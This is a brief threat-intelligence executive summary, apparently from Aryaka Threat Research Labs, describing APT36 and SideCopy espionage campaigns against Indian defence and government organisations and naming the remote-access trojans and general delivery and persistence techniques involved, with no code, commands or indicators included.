Espionage Without Noise: Understanding APT36’s Enduring Campaigns

**Executive Summary:** Aryaka Threat Research Labs observed multiple active espionage campaigns by Transparent Tribe (APT36) and affiliated SideCopy targeting Indian defense and government organizations, deploying GETA RAT on Windows (via LNK/HTA, mshta abuse, XAML deserialization and in-memory execution), ARES RAT on Linux (Go-based downloader, systemd user service persistence, automated profiling and exfiltration), and an emerging Desk RAT delivered via a malicious PowerPoint Add-In; these cross-platform, stealthy and persistent tools emphasize long-term intelligence collection and the need for cross-platform visibility and behavioral detection.